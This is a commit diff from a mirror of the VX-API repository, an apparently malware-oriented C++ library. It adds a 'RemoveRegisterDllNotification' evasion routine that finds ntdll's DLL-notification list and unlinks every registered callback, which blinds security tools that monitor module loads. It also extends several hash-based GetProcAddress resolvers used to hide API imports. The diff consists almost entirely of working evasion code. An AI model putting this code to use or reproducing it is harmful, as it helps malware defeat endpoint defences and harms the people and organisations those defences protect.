Mirrors
/
vxug-VXAPI
mirror of https://github.com/vxunderground/VX-API
6
0
Fork 0
Code Issues Projects Releases Wiki Activity

2.0.477 

2.0.477
This commit is contained in:
vxunderground 2022-12-16 12:45:05 -06:00
parent 9c1c612c73
commit d8e545407d
17 changed files with 315 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
README.md
View File

@ -81,6 +81,7 @@ You're free to use this in any manner you please. You do not need to use this en
| HookEngineRestoreHeapFree | rad9800 | Evasion |
| HookEngineUnhookHeapFree | rad9800 | Evasion |
| SleepObfuscationViaVirtualProtect | 5pider | Evasion |
| RemoveRegisterDllNotification | Rad98, Peter Winter-Smith | Evasion |
| GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
| GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
| GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
@ -180,8 +181,6 @@ You're free to use this in any manner you please. You do not need to use this en
| IcmpSendEcho2Ex | N/A | N/A |
| WQL Win32_Ping | Martin Friedrich | N/A |
| Process Injection | N/A | N/A |
| More String Manipulation code | N/A | Continuous Improvement |
| More hashing algorithms | N/A | Continuous Improvement |
# Notes
| Function Name | Note | Fixed |

2
VX-API/FunctionDeclaration.h
View File

@ -33,6 +33,8 @@ typedef NTSTATUS(NTAPI* RTLREGISTERWAIT)(PHANDLE, HANDLE, WORKERCALLBACKFUNC, PV
typedef NTSTATUS(NTAPI* RTLDEREGISTERWAITEX)(HANDLE, HANDLE);
typedef NTSTATUS(NTAPI* NTCONTINUE)(PCONTEXT, BOOL);
typedef NTSTATUS(NTAPI* LDRGETPROCEDUREADDRESS)(HMODULE, PANSI_STRING, WORD, PVOID);
typedef NTSTATUS(NTAPI* LDRREGISTERDLLNOTIFICATION)(ULONG, LDR_DLL_NOTIFICATION_FUNCTION*, PVOID, PVOID);
typedef NTSTATUS(NTAPI* LDRUNREGISTERDLLNOTIFICATION)(PVOID);

21
VX-API/GetProcAddressFowlerNollVoVariant1a.cpp
View File

@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _
DWORD dwFunctionHash = HashStringFowlerNollVoVariant1aA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;

21
VX-API/GetProcAddressJenkinsOneAtATime32Bit.cpp
View File

@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase,
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase,
DWORD dwFunctionHash = HashStringJenkinsOneAtATime32BitA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;

21
VX-API/GetProcAddressLoseLose.cpp
View File

@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 H
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 H
DWORD dwFunctionHash = HashStringLoseLoseA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;

21
VX-API/GetProcAddressMurmur.cpp
View File

@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
DWORD dwFunctionHash = HashStringMurmurA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;

22
VX-API/GetProcAddressRotr32.cpp
View File

@ -7,6 +7,12 @@ DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +27,21 @@ DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
DWORD dwFunctionHash = HashStringRotr32A((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;

21
VX-API/GetProcAddressSdbm.cpp
View File

@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
DWORD dwFunctionHash = HashStringSdbmA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;

21
VX-API/GetProcAddressSipHash.cpp
View File

@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Ha
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Ha
DWORD dwFunctionHash = HashStringSipHashA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;

21
VX-API/GetProcAddressSuperFastHash.cpp
View File

@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWOR
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWOR
DWORD dwFunctionHash = HashStringSuperFastHashA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;

21
VX-API/GetProcAddressUnknownGenericHash1.cpp
View File

@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In
DWORD dwFunctionHash = HashStringUnknownGenericHash1A((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;

24
VX-API/Internal.h
View File

@ -1131,3 +1131,27 @@ typedef struct AMBIGUOUS_STRING {
DWORD MaximumLength;
PUCHAR Buffer;
}AB_STRING, * PAB_STRING;
typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
ULONG Flags;
PUNICODE_STRING FullDllName;
PUNICODE_STRING BaseDllName;
PVOID DllBase;
ULONG SizeOfImage;
} LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA;
typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
ULONG Flags;
PUNICODE_STRING FullDllName;
PUNICODE_STRING BaseDllName;
PVOID DllBase;
ULONG SizeOfImage;
} LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA;
typedef union _LDR_DLL_NOTIFICATION_DATA {
LDR_DLL_LOADED_NOTIFICATION_DATA Loaded;
LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
} LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA;
typedef VOID(CALLBACK* LDR_DLL_NOTIFICATION_FUNCTION)(ULONG, CONST PLDR_DLL_NOTIFICATION_DATA, PVOID);

5
VX-API/Main.cpp
View File

@ -37,11 +37,6 @@ int main(VOID)
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
//hasha(NtMapViewOfSection);
UCHAR KeyBuf[17] = { 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x00};
SleepObfuscationViaVirtualProtect(4000, KeyBuf);
return dwError;
}

102
VX-API/RemoveRegisterDllNotification.cpp Normal file
View File

@ -0,0 +1,102 @@
#include "Win32Helper.h"
VOID DllLoadCallbackRoutine(ULONG NotificationReason, PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
}
PLIST_ENTRY UnusedSubroutineGetDllNotification(VOID)
{
LDRREGISTERDLLNOTIFICATION LdrRegisterDllNotification = NULL;
LDRUNREGISTERDLLNOTIFICATION LdrUnregisterDllNotification = NULL;
PVOID Cookie = NULL;
HMODULE hNtdll = NULL; PBYTE pbNtdll = NULL;;
PLIST_ENTRY LdrDllNotificationList = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
if (hNtdll == NULL)
return NULL;
else
pbNtdll = (PBYTE)hNtdll;
LdrRegisterDllNotification = (LDRREGISTERDLLNOTIFICATION)GetProcAddressA((DWORD64)hNtdll, "LdrRegisterDllNotification");
LdrUnregisterDllNotification = (LDRUNREGISTERDLLNOTIFICATION)GetProcAddressA((DWORD64)hNtdll, "LdrUnregisterDllNotification");
if (!LdrRegisterDllNotification || !LdrUnregisterDllNotification)
return NULL;
if (LdrRegisterDllNotification(0, (LDR_DLL_NOTIFICATION_FUNCTION*)DllLoadCallbackRoutine, NULL, &Cookie) != STATUS_SUCCESS)
return NULL;
else
LdrDllNotificationList = (PLIST_ENTRY)Cookie;
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &pbNtdll);
Section = IMAGE_FIRST_SECTION(Nt);
for (DWORD dwX = ERROR_SUCCESS; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA(".data", (PCHAR)Section->Name) == ERROR_SUCCESS)
{
PLIST_ENTRY LdrDllNotificationListNext = NULL;
PVOID BaseAddress = NULL, BaseAddressEnd = NULL;
BaseAddress = pbNtdll + Section->VirtualAddress;
BaseAddressEnd = (PVOID)((PULONG)BaseAddress + Section->Misc.VirtualSize);
LdrDllNotificationListNext = LdrDllNotificationList->Flink;
while (LdrDllNotificationListNext != LdrDllNotificationList)
{
if (LdrDllNotificationListNext >= BaseAddress && LdrDllNotificationListNext <= BaseAddressEnd)
{
if (LdrUnregisterDllNotification(Cookie) != STATUS_SUCCESS)
return NULL;
else
return LdrDllNotificationListNext;
}
LdrDllNotificationListNext = LdrDllNotificationListNext->Flink;
}
}
Section++;
}
return NULL;
}
BOOL RemoveRegisterDllNotification(VOID)
{
PLIST_ENTRY DllNotifictionList = NULL;
PLIST_ENTRY Head = NULL, Next = NULL;
DllNotifictionList = UnusedSubroutineGetDllNotification();
if (DllNotifictionList == NULL)
return FALSE;
Head = DllNotifictionList;
Next = DllNotifictionList->Flink;
while (Next != Head)
{
PLIST_ENTRY PreviousFlink = NULL, PreviousBlink = NULL;
PreviousFlink = Next->Flink;
PreviousBlink = Next->Blink;
PreviousFlink->Blink = PreviousBlink;
PreviousBlink->Flink = PreviousFlink;
Next->Flink = NULL;
Next->Blink = NULL;
Next = PreviousFlink;
}
return TRUE;
}

1
VX-API/VX-API.vcxproj
View File

@ -245,6 +245,7 @@
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
<ClCompile Include="RemoveDescriptorEntry.cpp" />
<ClCompile Include="RemoveRegisterDllNotification.cpp" />
<ClCompile Include="SetHardwareBreakpoint.cpp" />
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />

3
VX-API/VX-API.vcxproj.filters
View File

@ -522,6 +522,9 @@
<ClCompile Include="LdrLoadGetProcedureAddress.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="RemoveRegisterDllNotification.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Internal.h">

1
VX-API/Win32Helper.h
View File

@ -335,6 +335,7 @@ BOOL RemoveDllFromPebW(_In_ LPCWSTR lpModuleName);
BOOL HookEngineUnhookHeapFree(_In_ BOOL StartEngine);
BOOL HookEngineRestoreHeapFree(_In_ BOOL ShutdownEngine);
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key);
BOOL RemoveRegisterDllNotification(VOID);